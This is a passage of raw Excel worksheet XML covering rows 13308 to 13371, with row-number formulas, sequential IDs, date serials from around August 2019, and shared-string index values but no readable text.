      </c>
      <c r="B13308">
        <v>3307</v>
      </c>
      <c r="C13308" t="s">
        <v>19637</v>
      </c>
      <c r="D13308" s="1">
        <v>43686</v>
      </c>
      <c r="F13308" t="s">
        <v>10021</v>
      </c>
      <c r="G13308" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13309" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13309">
        <f t="shared" si="207"/>
        <v>13308</v>
      </c>
      <c r="B13309">
        <v>3308</v>
      </c>
      <c r="C13309" t="s">
        <v>19637</v>
      </c>
      <c r="D13309" s="1">
        <v>43702</v>
      </c>
      <c r="E13309" t="s">
        <v>19785</v>
      </c>
      <c r="F13309" t="s">
        <v>9975</v>
      </c>
      <c r="G13309" t="s">
        <v>23623</v>
      </c>
    </row>
    <row r="13310" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13310">
        <f t="shared" si="207"/>
        <v>13309</v>
      </c>
      <c r="B13310">
        <v>3309</v>
      </c>
      <c r="C13310" t="s">
        <v>19637</v>
      </c>
      <c r="D13310" s="1">
        <v>43696</v>
      </c>
      <c r="E13310" t="s">
        <v>19640</v>
      </c>
      <c r="F13310" t="s">
        <v>10021</v>
      </c>
      <c r="G13310" t="s">
        <v>23624</v>
      </c>
    </row>
    <row r="13311" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13311">
        <f t="shared" si="207"/>
        <v>13310</v>
      </c>
      <c r="B13311">
        <v>3310</v>
      </c>
      <c r="C13311" t="s">
        <v>19637</v>
      </c>
      <c r="D13311" s="1">
        <v>43698</v>
      </c>
      <c r="E13311" t="s">
        <v>20813</v>
      </c>
      <c r="F13311" t="s">
        <v>10526</v>
      </c>
      <c r="G13311" t="s">
        <v>23625</v>
      </c>
    </row>
    <row r="13312" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13312">
        <f t="shared" si="207"/>
        <v>13311</v>
      </c>
      <c r="B13312">
        <v>3311</v>
      </c>
      <c r="C13312" t="s">
        <v>19637</v>
      </c>
      <c r="D13312" s="1">
        <v>43696</v>
      </c>
      <c r="E13312" t="s">
        <v>23318</v>
      </c>
      <c r="F13312" t="s">
        <v>9978</v>
      </c>
      <c r="G13312" t="s">
        <v>23626</v>
      </c>
    </row>
    <row r="13313" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13313">
        <f t="shared" si="207"/>
        <v>13312</v>
      </c>
      <c r="B13313">
        <v>3312</v>
      </c>
      <c r="C13313" t="s">
        <v>19637</v>
      </c>
      <c r="D13313" s="1">
        <v>43691</v>
      </c>
      <c r="F13313" t="s">
        <v>10526</v>
      </c>
      <c r="G13313" t="s">
        <v>23627</v>
      </c>
    </row>
    <row r="13314" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13314">
        <f t="shared" si="207"/>
        <v>13313</v>
      </c>
      <c r="B13314">
        <v>3313</v>
      </c>
      <c r="C13314" t="s">
        <v>19637</v>
      </c>
      <c r="D13314" s="1">
        <v>43696</v>
      </c>
      <c r="E13314" t="s">
        <v>19640</v>
      </c>
      <c r="F13314" t="s">
        <v>9975</v>
      </c>
      <c r="G13314" t="s">
        <v>23628</v>
      </c>
    </row>
    <row r="13315" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13315">
        <f t="shared" ref="A13315:A13378" si="208">+ROW(A13314)</f>
        <v>13314</v>
      </c>
      <c r="B13315">
        <v>3314</v>
      </c>
      <c r="C13315" t="s">
        <v>19637</v>
      </c>
      <c r="D13315" s="1">
        <v>43693</v>
      </c>
      <c r="E13315" t="s">
        <v>19640</v>
      </c>
      <c r="F13315" t="s">
        <v>10021</v>
      </c>
      <c r="G13315" t="s">
        <v>23629</v>
      </c>
    </row>
    <row r="13316" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13316">
        <f t="shared" si="208"/>
        <v>13315</v>
      </c>
      <c r="B13316">
        <v>3315</v>
      </c>
      <c r="C13316" t="s">
        <v>19637</v>
      </c>
      <c r="D13316" s="1">
        <v>43687</v>
      </c>
      <c r="F13316" t="s">
        <v>9978</v>
      </c>
      <c r="G13316" t="s">
        <v>23630</v>
      </c>
    </row>
    <row r="13317" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13317">
        <f t="shared" si="208"/>
        <v>13316</v>
      </c>
      <c r="B13317">
        <v>3316</v>
      </c>
      <c r="C13317" t="s">
        <v>19637</v>
      </c>
      <c r="D13317" s="1">
        <v>43707</v>
      </c>
      <c r="F13317" t="s">
        <v>10526</v>
      </c>
      <c r="G13317" t="s">
        <v>23631</v>
      </c>
    </row>
    <row r="13318" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13318">
        <f t="shared" si="208"/>
        <v>13317</v>
      </c>
      <c r="B13318">
        <v>3317</v>
      </c>
      <c r="C13318" t="s">
        <v>19637</v>
      </c>
      <c r="D13318" s="1">
        <v>43707</v>
      </c>
      <c r="F13318" t="s">
        <v>10526</v>
      </c>
      <c r="G13318" t="s">
        <v>23632</v>
      </c>
    </row>
    <row r="13319" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13319">
        <f t="shared" si="208"/>
        <v>13318</v>
      </c>
      <c r="B13319">
        <v>3318</v>
      </c>
      <c r="C13319" t="s">
        <v>19637</v>
      </c>
      <c r="D13319" s="1">
        <v>43686</v>
      </c>
      <c r="E13319" t="s">
        <v>19750</v>
      </c>
      <c r="F13319" t="s">
        <v>9978</v>
      </c>
      <c r="G13319" t="s">
        <v>23633</v>
      </c>
    </row>
    <row r="13320" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13320">
        <f t="shared" si="208"/>
        <v>13319</v>
      </c>
      <c r="B13320">
        <v>3319</v>
      </c>
      <c r="C13320" t="s">
        <v>19637</v>
      </c>
      <c r="D13320" s="1">
        <v>43707</v>
      </c>
      <c r="E13320" t="s">
        <v>19640</v>
      </c>
      <c r="F13320" t="s">
        <v>10021</v>
      </c>
      <c r="G13320" t="s">
        <v>23634</v>
      </c>
    </row>
    <row r="13321" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13321">
        <f t="shared" si="208"/>
        <v>13320</v>
      </c>
      <c r="B13321">
        <v>3320</v>
      </c>
      <c r="C13321" t="s">
        <v>19637</v>
      </c>
      <c r="D13321" s="1">
        <v>43687</v>
      </c>
      <c r="E13321" t="s">
        <v>21942</v>
      </c>
      <c r="F13321" t="s">
        <v>10526</v>
      </c>
      <c r="G13321" t="s">
        <v>23635</v>
      </c>
    </row>
    <row r="13322" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13322">
        <f t="shared" si="208"/>
        <v>13321</v>
      </c>
      <c r="B13322">
        <v>3321</v>
      </c>
      <c r="C13322" t="s">
        <v>19637</v>
      </c>
      <c r="D13322" s="1">
        <v>43689</v>
      </c>
      <c r="E13322" t="s">
        <v>21083</v>
      </c>
      <c r="F13322" t="s">
        <v>10526</v>
      </c>
      <c r="G13322" t="s">
        <v>23636</v>
      </c>
    </row>
    <row r="13323" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13323">
        <f t="shared" si="208"/>
        <v>13322</v>
      </c>
      <c r="B13323">
        <v>3322</v>
      </c>
      <c r="C13323" t="s">
        <v>19637</v>
      </c>
      <c r="D13323" s="1">
        <v>43700</v>
      </c>
      <c r="E13323" t="s">
        <v>21499</v>
      </c>
      <c r="F13323" t="s">
        <v>9978</v>
      </c>
      <c r="G13323" t="s">
        <v>23637</v>
      </c>
    </row>
    <row r="13324" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13324">
        <f t="shared" si="208"/>
        <v>13323</v>
      </c>
      <c r="B13324">
        <v>3323</v>
      </c>
      <c r="C13324" t="s">
        <v>19637</v>
      </c>
      <c r="D13324" s="1">
        <v>43694</v>
      </c>
      <c r="E13324" t="s">
        <v>19690</v>
      </c>
      <c r="F13324" t="s">
        <v>9978</v>
      </c>
      <c r="G13324" t="s">
        <v>23638</v>
      </c>
    </row>
    <row r="13325" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13325">
        <f t="shared" si="208"/>
        <v>13324</v>
      </c>
      <c r="B13325">
        <v>3324</v>
      </c>
      <c r="C13325" t="s">
        <v>19637</v>
      </c>
      <c r="D13325" s="1">
        <v>43693</v>
      </c>
      <c r="F13325" t="s">
        <v>10526</v>
      </c>
      <c r="G13325" t="s">
        <v>23639</v>
      </c>
    </row>
    <row r="13326" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13326">
        <f t="shared" si="208"/>
        <v>13325</v>
      </c>
      <c r="B13326">
        <v>3325</v>
      </c>
      <c r="C13326" t="s">
        <v>19637</v>
      </c>
      <c r="D13326" s="1">
        <v>43700</v>
      </c>
      <c r="F13326" t="s">
        <v>10526</v>
      </c>
      <c r="G13326" t="s">
        <v>23640</v>
      </c>
    </row>
    <row r="13327" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13327">
        <f t="shared" si="208"/>
        <v>13326</v>
      </c>
      <c r="B13327">
        <v>3326</v>
      </c>
      <c r="C13327" t="s">
        <v>19637</v>
      </c>
      <c r="D13327" s="1">
        <v>43690</v>
      </c>
      <c r="E13327" t="s">
        <v>19650</v>
      </c>
      <c r="F13327" t="s">
        <v>10021</v>
      </c>
      <c r="G13327" t="s">
        <v>23641</v>
      </c>
    </row>
    <row r="13328" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13328">
        <f t="shared" si="208"/>
        <v>13327</v>
      </c>
      <c r="B13328">
        <v>3327</v>
      </c>
      <c r="C13328" t="s">
        <v>19637</v>
      </c>
      <c r="D13328" s="1">
        <v>43685</v>
      </c>
      <c r="E13328" t="s">
        <v>19640</v>
      </c>
      <c r="F13328" t="s">
        <v>9975</v>
      </c>
      <c r="G13328" t="s">
        <v>23642</v>
      </c>
    </row>
    <row r="13329" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13329">
        <f t="shared" si="208"/>
        <v>13328</v>
      </c>
      <c r="B13329">
        <v>3328</v>
      </c>
      <c r="C13329" t="s">
        <v>19637</v>
      </c>
      <c r="D13329" s="1">
        <v>43692</v>
      </c>
      <c r="F13329" t="s">
        <v>10526</v>
      </c>
      <c r="G13329" t="s">
        <v>23643</v>
      </c>
    </row>
    <row r="13330" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13330">
        <f t="shared" si="208"/>
        <v>13329</v>
      </c>
      <c r="B13330">
        <v>3329</v>
      </c>
      <c r="C13330" t="s">
        <v>19637</v>
      </c>
      <c r="D13330" s="1">
        <v>43683</v>
      </c>
      <c r="F13330" t="s">
        <v>10526</v>
      </c>
      <c r="G13330" t="s">
        <v>23644</v>
      </c>
    </row>
    <row r="13331" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13331">
        <f t="shared" si="208"/>
        <v>13330</v>
      </c>
      <c r="B13331">
        <v>3330</v>
      </c>
      <c r="C13331" t="s">
        <v>19637</v>
      </c>
      <c r="D13331" s="1">
        <v>43705</v>
      </c>
      <c r="E13331" t="s">
        <v>19693</v>
      </c>
      <c r="F13331" t="s">
        <v>10526</v>
      </c>
      <c r="G13331" t="s">
        <v>23645</v>
      </c>
    </row>
    <row r="13332" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13332">
        <f t="shared" si="208"/>
        <v>13331</v>
      </c>
      <c r="B13332">
        <v>3331</v>
      </c>
      <c r="C13332" t="s">
        <v>19637</v>
      </c>
      <c r="D13332" s="1">
        <v>43690</v>
      </c>
      <c r="E13332" t="s">
        <v>19648</v>
      </c>
      <c r="F13332" t="s">
        <v>10021</v>
      </c>
      <c r="G13332" t="s">
        <v>23646</v>
      </c>
    </row>
    <row r="13333" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13333">
        <f t="shared" si="208"/>
        <v>13332</v>
      </c>
      <c r="B13333">
        <v>3332</v>
      </c>
      <c r="C13333" t="s">
        <v>19637</v>
      </c>
      <c r="D13333" s="1">
        <v>43704</v>
      </c>
      <c r="E13333" t="s">
        <v>20187</v>
      </c>
      <c r="F13333" t="s">
        <v>9975</v>
      </c>
      <c r="G13333" t="s">
        <v>23647</v>
      </c>
    </row>
    <row r="13334" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13334">
        <f t="shared" si="208"/>
        <v>13333</v>
      </c>
      <c r="B13334">
        <v>3333</v>
      </c>
      <c r="C13334" t="s">
        <v>19637</v>
      </c>
      <c r="D13334" s="1">
        <v>43685</v>
      </c>
      <c r="E13334" t="s">
        <v>20228</v>
      </c>
      <c r="F13334" t="s">
        <v>10021</v>
      </c>
      <c r="G13334" t="s">
        <v>23648</v>
      </c>
    </row>
    <row r="13335" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13335">
        <f t="shared" si="208"/>
        <v>13334</v>
      </c>
      <c r="B13335">
        <v>3334</v>
      </c>
      <c r="C13335" t="s">
        <v>19637</v>
      </c>
      <c r="D13335" s="1">
        <v>43699</v>
      </c>
      <c r="F13335" t="s">
        <v>10526</v>
      </c>
      <c r="G13335" t="s">
        <v>23649</v>
      </c>
    </row>
    <row r="13336" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13336">
        <f t="shared" si="208"/>
        <v>13335</v>
      </c>
      <c r="B13336">
        <v>3335</v>
      </c>
      <c r="C13336" t="s">
        <v>19637</v>
      </c>
      <c r="D13336" s="1">
        <v>43707</v>
      </c>
      <c r="E13336" t="s">
        <v>19896</v>
      </c>
      <c r="F13336" t="s">
        <v>10021</v>
      </c>
      <c r="G13336" t="s">
        <v>23650</v>
      </c>
    </row>
    <row r="13337" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13337">
        <f t="shared" si="208"/>
        <v>13336</v>
      </c>
      <c r="B13337">
        <v>3336</v>
      </c>
      <c r="C13337" t="s">
        <v>19637</v>
      </c>
      <c r="D13337" s="1">
        <v>43681</v>
      </c>
      <c r="F13337" t="s">
        <v>10021</v>
      </c>
      <c r="G13337" t="s">
        <v>23651</v>
      </c>
    </row>
    <row r="13338" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13338">
        <f t="shared" si="208"/>
        <v>13337</v>
      </c>
      <c r="B13338">
        <v>3337</v>
      </c>
      <c r="C13338" t="s">
        <v>19637</v>
      </c>
      <c r="D13338" s="1">
        <v>43678</v>
      </c>
      <c r="E13338" t="s">
        <v>21415</v>
      </c>
      <c r="F13338" t="s">
        <v>10021</v>
      </c>
      <c r="G13338" t="s">
        <v>23652</v>
      </c>
    </row>
    <row r="13339" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13339">
        <f t="shared" si="208"/>
        <v>13338</v>
      </c>
      <c r="B13339">
        <v>3338</v>
      </c>
      <c r="C13339" t="s">
        <v>19637</v>
      </c>
      <c r="D13339" s="1">
        <v>43682</v>
      </c>
      <c r="E13339" t="s">
        <v>23653</v>
      </c>
      <c r="F13339" t="s">
        <v>10021</v>
      </c>
      <c r="G13339" t="s">
        <v>23654</v>
      </c>
    </row>
    <row r="13340" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13340">
        <f t="shared" si="208"/>
        <v>13339</v>
      </c>
      <c r="B13340">
        <v>3339</v>
      </c>
      <c r="C13340" t="s">
        <v>19637</v>
      </c>
      <c r="D13340" s="1">
        <v>43708</v>
      </c>
      <c r="E13340" t="s">
        <v>23655</v>
      </c>
      <c r="F13340" t="s">
        <v>10526</v>
      </c>
      <c r="G13340" t="s">
        <v>23656</v>
      </c>
    </row>
    <row r="13341" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13341">
        <f t="shared" si="208"/>
        <v>13340</v>
      </c>
      <c r="B13341">
        <v>3340</v>
      </c>
      <c r="C13341" t="s">
        <v>19637</v>
      </c>
      <c r="D13341" s="1">
        <v>43699</v>
      </c>
      <c r="E13341" t="s">
        <v>19896</v>
      </c>
      <c r="F13341" t="s">
        <v>10021</v>
      </c>
      <c r="G13341" t="s">
        <v>23657</v>
      </c>
    </row>
    <row r="13342" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13342">
        <f t="shared" si="208"/>
        <v>13341</v>
      </c>
      <c r="B13342">
        <v>3341</v>
      </c>
      <c r="C13342" t="s">
        <v>19637</v>
      </c>
      <c r="D13342" s="1">
        <v>43699</v>
      </c>
      <c r="E13342" t="s">
        <v>22166</v>
      </c>
      <c r="F13342" t="s">
        <v>10526</v>
      </c>
      <c r="G13342" t="s">
        <v>23658</v>
      </c>
    </row>
    <row r="13343" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13343">
        <f t="shared" si="208"/>
        <v>13342</v>
      </c>
      <c r="B13343">
        <v>3342</v>
      </c>
      <c r="C13343" t="s">
        <v>19637</v>
      </c>
      <c r="D13343" s="1">
        <v>43695</v>
      </c>
      <c r="E13343" t="s">
        <v>19680</v>
      </c>
      <c r="F13343" t="s">
        <v>10021</v>
      </c>
      <c r="G13343" t="s">
        <v>23659</v>
      </c>
    </row>
    <row r="13344" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13344">
        <f t="shared" si="208"/>
        <v>13343</v>
      </c>
      <c r="B13344">
        <v>3343</v>
      </c>
      <c r="C13344" t="s">
        <v>19637</v>
      </c>
      <c r="D13344" s="1">
        <v>43705</v>
      </c>
      <c r="E13344" t="s">
        <v>19810</v>
      </c>
      <c r="F13344" t="s">
        <v>10526</v>
      </c>
      <c r="G13344" t="s">
        <v>23660</v>
      </c>
    </row>
    <row r="13345" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13345">
        <f t="shared" si="208"/>
        <v>13344</v>
      </c>
      <c r="B13345">
        <v>3344</v>
      </c>
      <c r="C13345" t="s">
        <v>19637</v>
      </c>
      <c r="D13345" s="1">
        <v>43696</v>
      </c>
      <c r="E13345" t="s">
        <v>19640</v>
      </c>
      <c r="F13345" t="s">
        <v>10021</v>
      </c>
      <c r="G13345" t="s">
        <v>23661</v>
      </c>
    </row>
    <row r="13346" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13346">
        <f t="shared" si="208"/>
        <v>13345</v>
      </c>
      <c r="B13346">
        <v>3345</v>
      </c>
      <c r="C13346" t="s">
        <v>19637</v>
      </c>
      <c r="D13346" s="1">
        <v>43696</v>
      </c>
      <c r="E13346" t="s">
        <v>19680</v>
      </c>
      <c r="F13346" t="s">
        <v>10021</v>
      </c>
      <c r="G13346" t="s">
        <v>23662</v>
      </c>
    </row>
    <row r="13347" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13347">
        <f t="shared" si="208"/>
        <v>13346</v>
      </c>
      <c r="B13347">
        <v>3346</v>
      </c>
      <c r="C13347" t="s">
        <v>19637</v>
      </c>
      <c r="D13347" s="1">
        <v>43704</v>
      </c>
      <c r="F13347" t="s">
        <v>10526</v>
      </c>
      <c r="G13347" t="s">
        <v>22281</v>
      </c>
    </row>
    <row r="13348" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13348">
        <f t="shared" si="208"/>
        <v>13347</v>
      </c>
      <c r="B13348">
        <v>3347</v>
      </c>
      <c r="C13348" t="s">
        <v>19637</v>
      </c>
      <c r="D13348" s="1">
        <v>43702</v>
      </c>
      <c r="E13348" t="s">
        <v>19638</v>
      </c>
      <c r="F13348" t="s">
        <v>10021</v>
      </c>
      <c r="G13348" t="s">
        <v>23663</v>
      </c>
    </row>
    <row r="13349" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13349">
        <f t="shared" si="208"/>
        <v>13348</v>
      </c>
      <c r="B13349">
        <v>3348</v>
      </c>
      <c r="C13349" t="s">
        <v>19637</v>
      </c>
      <c r="D13349" s="1">
        <v>43689</v>
      </c>
      <c r="E13349" t="s">
        <v>19650</v>
      </c>
      <c r="F13349" t="s">
        <v>10021</v>
      </c>
      <c r="G13349" t="s">
        <v>23664</v>
      </c>
    </row>
    <row r="13350" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13350">
        <f t="shared" si="208"/>
        <v>13349</v>
      </c>
      <c r="B13350">
        <v>3349</v>
      </c>
      <c r="C13350" t="s">
        <v>19637</v>
      </c>
      <c r="D13350" s="1">
        <v>43707</v>
      </c>
      <c r="E13350" t="s">
        <v>22791</v>
      </c>
      <c r="F13350" t="s">
        <v>10021</v>
      </c>
      <c r="G13350" t="s">
        <v>23665</v>
      </c>
    </row>
    <row r="13351" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13351">
        <f t="shared" si="208"/>
        <v>13350</v>
      </c>
      <c r="B13351">
        <v>3350</v>
      </c>
      <c r="C13351" t="s">
        <v>19637</v>
      </c>
      <c r="D13351" s="1">
        <v>43680</v>
      </c>
      <c r="F13351" t="s">
        <v>9975</v>
      </c>
      <c r="G13351" t="s">
        <v>23666</v>
      </c>
    </row>
    <row r="13352" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13352">
        <f t="shared" si="208"/>
        <v>13351</v>
      </c>
      <c r="B13352">
        <v>3351</v>
      </c>
      <c r="C13352" t="s">
        <v>19637</v>
      </c>
      <c r="D13352" s="1">
        <v>43687</v>
      </c>
      <c r="E13352" t="s">
        <v>23667</v>
      </c>
      <c r="F13352" t="s">
        <v>9978</v>
      </c>
      <c r="G13352" t="s">
        <v>23668</v>
      </c>
    </row>
    <row r="13353" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13353">
        <f t="shared" si="208"/>
        <v>13352</v>
      </c>
      <c r="B13353">
        <v>3352</v>
      </c>
      <c r="C13353" t="s">
        <v>19637</v>
      </c>
      <c r="D13353" s="1">
        <v>43682</v>
      </c>
      <c r="E13353" t="s">
        <v>19640</v>
      </c>
      <c r="F13353" t="s">
        <v>10526</v>
      </c>
      <c r="G13353" t="s">
        <v>23669</v>
      </c>
    </row>
    <row r="13354" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13354">
        <f t="shared" si="208"/>
        <v>13353</v>
      </c>
      <c r="B13354">
        <v>3353</v>
      </c>
      <c r="C13354" t="s">
        <v>19637</v>
      </c>
      <c r="D13354" s="1">
        <v>43681</v>
      </c>
      <c r="E13354" t="s">
        <v>22348</v>
      </c>
      <c r="F13354" t="s">
        <v>10526</v>
      </c>
      <c r="G13354" t="s">
        <v>23670</v>
      </c>
    </row>
    <row r="13355" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13355">
        <f t="shared" si="208"/>
        <v>13354</v>
      </c>
      <c r="B13355">
        <v>3354</v>
      </c>
      <c r="C13355" t="s">
        <v>19637</v>
      </c>
      <c r="D13355" s="1">
        <v>43699</v>
      </c>
      <c r="E13355" t="s">
        <v>23671</v>
      </c>
      <c r="F13355" t="s">
        <v>10021</v>
      </c>
      <c r="G13355" t="s">
        <v>23672</v>
      </c>
    </row>
    <row r="13356" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13356">
        <f t="shared" si="208"/>
        <v>13355</v>
      </c>
      <c r="B13356">
        <v>3355</v>
      </c>
      <c r="C13356" t="s">
        <v>19637</v>
      </c>
      <c r="D13356" s="1">
        <v>43696</v>
      </c>
      <c r="E13356" t="s">
        <v>19640</v>
      </c>
      <c r="F13356" t="s">
        <v>9975</v>
      </c>
      <c r="G13356" t="s">
        <v>23673</v>
      </c>
    </row>
    <row r="13357" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13357">
        <f t="shared" si="208"/>
        <v>13356</v>
      </c>
      <c r="B13357">
        <v>3356</v>
      </c>
      <c r="C13357" t="s">
        <v>19637</v>
      </c>
      <c r="D13357" s="1">
        <v>43683</v>
      </c>
      <c r="F13357" t="s">
        <v>9978</v>
      </c>
      <c r="G13357" t="s">
        <v>23674</v>
      </c>
    </row>
    <row r="13358" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13358">
        <f t="shared" si="208"/>
        <v>13357</v>
      </c>
      <c r="B13358">
        <v>3357</v>
      </c>
      <c r="C13358" t="s">
        <v>19637</v>
      </c>
      <c r="D13358" s="1">
        <v>43708</v>
      </c>
      <c r="F13358" t="s">
        <v>10526</v>
      </c>
      <c r="G13358" t="s">
        <v>23675</v>
      </c>
    </row>
    <row r="13359" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13359">
        <f t="shared" si="208"/>
        <v>13358</v>
      </c>
      <c r="B13359">
        <v>3358</v>
      </c>
      <c r="C13359" t="s">
        <v>19637</v>
      </c>
      <c r="D13359" s="1">
        <v>43707</v>
      </c>
      <c r="F13359" t="s">
        <v>9975</v>
      </c>
      <c r="G13359" t="s">
        <v>23676</v>
      </c>
    </row>
    <row r="13360" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13360">
        <f t="shared" si="208"/>
        <v>13359</v>
      </c>
      <c r="B13360">
        <v>3359</v>
      </c>
      <c r="C13360" t="s">
        <v>19637</v>
      </c>
      <c r="D13360" s="1">
        <v>43700</v>
      </c>
      <c r="E13360" t="s">
        <v>19640</v>
      </c>
      <c r="F13360" t="s">
        <v>10526</v>
      </c>
      <c r="G13360" t="s">
        <v>23677</v>
      </c>
    </row>
    <row r="13361" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13361">
        <f t="shared" si="208"/>
        <v>13360</v>
      </c>
      <c r="B13361">
        <v>3360</v>
      </c>
      <c r="C13361" t="s">
        <v>19637</v>
      </c>
      <c r="D13361" s="1">
        <v>43692</v>
      </c>
      <c r="F13361" t="s">
        <v>10526</v>
      </c>
      <c r="G13361" t="s">
        <v>23678</v>
      </c>
    </row>
    <row r="13362" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13362">
        <f t="shared" si="208"/>
        <v>13361</v>
      </c>
      <c r="B13362">
        <v>3361</v>
      </c>
      <c r="C13362" t="s">
        <v>19637</v>
      </c>
      <c r="D13362" s="1">
        <v>43688</v>
      </c>
      <c r="F13362" t="s">
        <v>10526</v>
      </c>
      <c r="G13362" t="s">
        <v>23679</v>
      </c>
    </row>
    <row r="13363" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13363">
        <f t="shared" si="208"/>
        <v>13362</v>
      </c>
      <c r="B13363">
        <v>3362</v>
      </c>
      <c r="C13363" t="s">
        <v>19637</v>
      </c>
      <c r="D13363" s="1">
        <v>43696</v>
      </c>
      <c r="F13363" t="s">
        <v>9975</v>
      </c>
      <c r="G13363" t="s">
        <v>23680</v>
      </c>
    </row>
    <row r="13364" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13364">
        <f t="shared" si="208"/>
        <v>13363</v>
      </c>
      <c r="B13364">
        <v>3363</v>
      </c>
      <c r="C13364" t="s">
        <v>19637</v>
      </c>
      <c r="D13364" s="1">
        <v>43693</v>
      </c>
      <c r="E13364" t="s">
        <v>23681</v>
      </c>
      <c r="F13364" t="s">
        <v>9978</v>
      </c>
      <c r="G13364" t="s">
        <v>23682</v>
      </c>
    </row>
    <row r="13365" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13365">
        <f t="shared" si="208"/>
        <v>13364</v>
      </c>
      <c r="B13365">
        <v>3364</v>
      </c>
      <c r="C13365" t="s">
        <v>19637</v>
      </c>
      <c r="D13365" s="1">
        <v>43704</v>
      </c>
      <c r="E13365" t="s">
        <v>23683</v>
      </c>
      <c r="F13365" t="s">
        <v>10526</v>
      </c>
      <c r="G13365" t="s">
        <v>23684</v>
      </c>
    </row>
    <row r="13366" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13366">
        <f t="shared" si="208"/>
        <v>13365</v>
      </c>
      <c r="B13366">
        <v>3365</v>
      </c>
      <c r="C13366" t="s">
        <v>19637</v>
      </c>
      <c r="D13366" s="1">
        <v>43704</v>
      </c>
      <c r="F13366" t="s">
        <v>10526</v>
      </c>
      <c r="G13366" t="s">
        <v>23685</v>
      </c>
    </row>
    <row r="13367" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13367">
        <f t="shared" si="208"/>
        <v>13366</v>
      </c>
      <c r="B13367">
        <v>3366</v>
      </c>
      <c r="C13367" t="s">
        <v>19637</v>
      </c>
      <c r="D13367" s="1">
        <v>43702</v>
      </c>
      <c r="E13367" t="s">
        <v>23686</v>
      </c>
      <c r="F13367" t="s">
        <v>10021</v>
      </c>
      <c r="G13367" t="s">
        <v>23687</v>
      </c>
    </row>
    <row r="13368" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13368">
        <f t="shared" si="208"/>
        <v>13367</v>
      </c>
      <c r="B13368">
        <v>3367</v>
      </c>
      <c r="C13368" t="s">
        <v>19637</v>
      </c>
      <c r="D13368" s="1">
        <v>43690</v>
      </c>
      <c r="F13368" t="s">
        <v>9978</v>
      </c>
      <c r="G13368" t="s">
        <v>23688</v>
      </c>
    </row>
    <row r="13369" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13369">
        <f t="shared" si="208"/>
        <v>13368</v>
      </c>
      <c r="B13369">
        <v>3368</v>
      </c>
      <c r="C13369" t="s">
        <v>19637</v>
      </c>
      <c r="D13369" s="1">
        <v>43701</v>
      </c>
      <c r="E13369" t="s">
        <v>19881</v>
      </c>
      <c r="F13369" t="s">
        <v>9978</v>
      </c>
      <c r="G13369" t="s">
        <v>23689</v>
      </c>
    </row>
    <row r="13370" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13370">
        <f t="shared" si="208"/>
        <v>13369</v>
      </c>
      <c r="B13370">
        <v>3369</v>
      </c>
      <c r="C13370" t="s">
        <v>19637</v>
      </c>
      <c r="D13370" s="1">
        <v>43696</v>
      </c>
      <c r="F13370" t="s">
        <v>10526</v>
      </c>
      <c r="G13370" t="s">
        <v>23690</v>
      </c>
    </row>
    <row r="13371" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13371">
        <f t="shared" si="208"/>
        <v>13370</v>
      </c>
      <c r="B13371">
        <v>3370</v>
      </c>
      <c r="C13371" t="s">
        <v>19637</v>
      </c>
      <c r="D13371" s="1">
        <v>43702</v>
      </c>
      <c r="E13371" t="s">
        <v>20187</v>
      </c>
